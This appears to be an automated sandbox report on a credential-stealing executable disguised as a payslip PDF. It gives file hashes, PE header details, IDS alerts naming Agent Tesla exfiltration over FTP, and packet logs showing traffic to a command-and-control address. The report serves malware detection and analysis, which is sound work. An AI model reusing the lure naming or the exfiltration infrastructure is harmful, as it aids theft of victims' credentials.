                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):780288
                                            Entropy (8bit):7.6529324185750145
                                            Encrypted:false
                                            SSDEEP:12288:Tlx7M0cl2LPU1ceS3UoWl8whrP9jltoinVaYt3u/32z0oBGg7QeKhZfmGt:LA0c+2SA6whr14kbt3fz0oBftK/f5
                                            MD5:0D4985C828F3F9F6974B1602C92EE962
                                            SHA1:0F11A5DEEF40A3DEC6CB8CB0CC6AE057BD56C2DD
                                            SHA-256:59CBE4E681C4371B18A5F6D457369560CE9E4F0EDA5A39DE1ACAB8B5BDF73BDA
                                            SHA-512:5EDA720231DEF9F8C7260DFB412AB753321338FD4A31E561F78A59445EEB63C92C547DC5A4145A3114B33DA022771D7EEB271FD5978D4696351B323F9AD9BB15
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 34%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G...............0.............v.... ........@.. .......................@............@.................................!...O............................ ......P...p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................U.......H.......P....~..........Xe...n..........................................&.(......*...0.............s.....+..*....0..3...........{....o........o......o.........,..o........+..*.........."......:..{....o.....*:..{....o.....*:..{....o.....*....0..l........s.....r...p...(......+4...rA..po.....rG..po.....r_..po....(....s....o.......o......-.....,..o.........+...*........DY.......0...........s ....ri..p.o.....?...(!....s........(....}.....+J.....(...........s"...o#....{....r...po..
                                            Process:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.6529324185750145
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Payslip_October_2024_pdf.exe
                                            File size:780'288 bytes
                                            MD5:0d4985c828f3f9f6974b1602c92ee962
                                            SHA1:0f11a5deef40a3dec6cb8cb0cc6ae057bd56c2dd
                                            SHA256:59cbe4e681c4371b18a5f6d457369560ce9e4f0eda5a39de1acab8b5bdf73bda
                                            SHA512:5eda720231def9f8c7260dfb412ab753321338fd4a31e561f78a59445eeb63c92c547dc5a4145a3114b33da022771d7eeb271fd5978d4696351b323f9ad9bb15
                                            SSDEEP:12288:Tlx7M0cl2LPU1ceS3UoWl8whrP9jltoinVaYt3u/32z0oBGg7QeKhZfmGt:LA0c+2SA6whr14kbt3fz0oBftK/f5
                                            TLSH:C8F4BEE03A767B1ADEA95BB09559DDB183F02969B004FAE65DD93BC7349C7009E08F03
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G................0.............v.... ........@.. .......................@............@................................
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x4bfc76
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xA7C547C1 [Wed Mar 12 19:47:13 2059 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            push ebx
                                            add byte ptr [ecx+00h], bh
                                            jnc 00007F548CEE2F12h
                                            je 00007F548CEE2F12h
                                            add byte ptr [ebp+00h], ch
                                            add byte ptr [ecx+00h], al
                                            arpl word ptr [eax], ax
                                            je 00007F548CEE2F12h
                                            imul eax, dword ptr [eax], 00610076h
                                            je 00007F548CEE2F12h
                                            outsd
                                            add byte ptr [edx+00h], dh
                                            add byte ptr [eax], al
                                             Name                                  Virtual Address  Virtual Size  Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_IMPORT          0xbfc21          0x4f          .text
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc0000          0x594         .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc2000          0xc           .reloc
                                             IMAGE_DIRECTORY_ENTRY_DEBUG           0xbd450          0x70          .text
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                             IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                             Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                             .text   0x2000           0xbdc9c       0xbde00   631935b13bb35572cd75b81871249138  False     0.8473682315668203  data       7.659760721121941    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                             .rsrc   0xc0000          0x594         0x600     c656935232eedc387a607a918ab6d6c0  False     0.4140625           data       4.025842667742365    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .reloc  0xc2000          0xc           0x200     61e37f9e3cd1f0e6dfa6db6e84d930e5  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                             Name         RVA      Size   Type                                                                                Language  Country  ZLIB Complexity
                                             RT_VERSION   0xc0090  0x304  data                                                                                                   0.4339378238341969
                                             RT_MANIFEST  0xc03a4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.5489795918367347
                                             DLL          Import
                                             mscoree.dll  _CorExeMain
                                             Timestamp                        SID      Signature                                                               Severity  Source IP     Source Port  Dest IP       Dest Port  Protocol
                                             2024-11-04T10:13:19.167320+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         4.245.163.56  443          192.168.2.5   49717      TCP
                                             2024-11-04T10:13:19.381403+0100  2029927  ET MALWARE AgentTesla Exfil via FTP                                     1         192.168.2.5   49716        110.4.45.197  21         TCP
                                             2024-11-04T10:13:20.357961+0100  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity                            1         192.168.2.5   49722        110.4.45.197  61813      TCP
                                             2024-11-04T10:13:20.363581+0100  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity                            1         192.168.2.5   49722        110.4.45.197  61813      TCP
                                             2024-11-04T10:13:27.924804+0100  2029927  ET MALWARE AgentTesla Exfil via FTP                                     1         192.168.2.5   49745        110.4.45.197  21         TCP
                                             2024-11-04T10:13:28.852402+0100  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity                            1         192.168.2.5   49766        110.4.45.197  64083      TCP
                                             2024-11-04T10:13:28.863602+0100  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity                            1         192.168.2.5   49766        110.4.45.197  64083      TCP
                                             2024-11-04T10:13:58.256553+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         4.245.163.56  443          192.168.2.5   49929      TCP
                                             Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                            Nov 4, 2024 10:13:20.358042002 CET4972261813192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.363042116 CET6181349722110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.363521099 CET6181349722110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.363580942 CET4972261813192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.399741888 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.712255001 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.739705086 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.745652914 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:21.124290943 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:21.126398087 CET4972964015192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:21.139827013 CET6401549729110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:21.141788960 CET4972964015192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:21.141900063 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:21.148144960 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.771806955 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.771951914 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.771981955 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.772032976 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:22.773709059 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:23.210032940 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.210076094 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.210161924 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.214148045 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.214163065 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.823537111 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.823617935 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.829212904 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.829221964 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.829476118 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.884107113 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.891398907 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.935327053 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:24.063031912 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:24.063100100 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:24.063577890 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:24.066504955 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:24.347567081 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:24.348931074 CET4972964015192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:24.610375881 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:24.615746975 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:24.616365910 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:25.844021082 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:25.844403028 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:25.844455957 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:25.844511986 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:25.849560976 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.184287071 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.185314894 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:26.190713882 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.556669950 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.560091019 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:26.565233946 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.900331974 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.900731087 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:26.905666113 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.240027905 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.242155075 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.247369051 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.580374956 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.581007957 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.586807966 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.918997049 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.919557095 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.924659967 CET6408349766110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.924737930 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.924803972 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.929692030 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.852077007 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.852401972 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:28.852449894 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:28.857403994 CET6408349766110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.863527060 CET6408349766110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.863601923 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:28.899727106 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.205054045 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.240055084 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.244944096 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.577224016 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.577826023 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.582608938 CET5613749774110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.582706928 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.582776070 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.587974072 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.494503021 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.494716883 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.494749069 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.499708891 CET5613749774110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.500118971 CET5613749774110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.500176907 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.540388107 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.842742920 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.843142986 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.847856045 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:31.181891918 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:31.182421923 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:31.187278986 CET6533549783110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:31.187361956 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:31.187427044 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:31.192203045 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.126950026 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.127156019 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.132755995 CET6533549783110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.132810116 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.181005001 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.476691008 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.477042913 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.481935978 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.816212893 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.816824913 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.821764946 CET5805449794110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.821863890 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.821898937 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.826891899 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:33.740529060 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:33.740865946 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:33.746295929 CET5805449794110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:33.746376038 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:33.790399075 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:34.090506077 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:34.134129047 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.624996901 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.689357996 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.832688093 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:32.832704067 CET2149996110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:32.832782030 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.833149910 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.838279009 CET2149996110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:32.838323116 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.182800055 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:33.183273077 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.188101053 CET6336349997110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:33.188177109 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.188241005 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.193021059 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.113265038 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.113452911 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.113497019 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.118223906 CET6336349997110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.118628979 CET6336349997110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.118676901 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.165401936 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.464957952 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.509263992 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.123785973 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.128592014 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:35.485382080 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:35.485990047 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.490825891 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:35.490891933 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.490983963 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.495807886 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.384284019 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.392203093 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397134066 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397157907 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397201061 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397211075 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397239923 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397249937 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397265911 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397294998 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397304058 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397313118 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397341967 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397344112 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397351980 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397352934 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397372961 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397387981 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.402324915 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402335882 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402350903 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402367115 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402395010 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402404070 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402412891 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.402581930 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.402647018 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402834892 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.407490015 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.407752037 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.407958031 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.408020020 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.413096905 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.414086103 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.414139986 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.433866024 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:37.137233019 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:37.181088924 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:42.815064907 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:42.820048094 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:43.174119949 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:43.174683094 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:43.179574013 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:43.179646969 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:43.179708958 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:43.184674978 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.120671988 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.121968031 CET4999949628192.168.2.5110.4.45.197
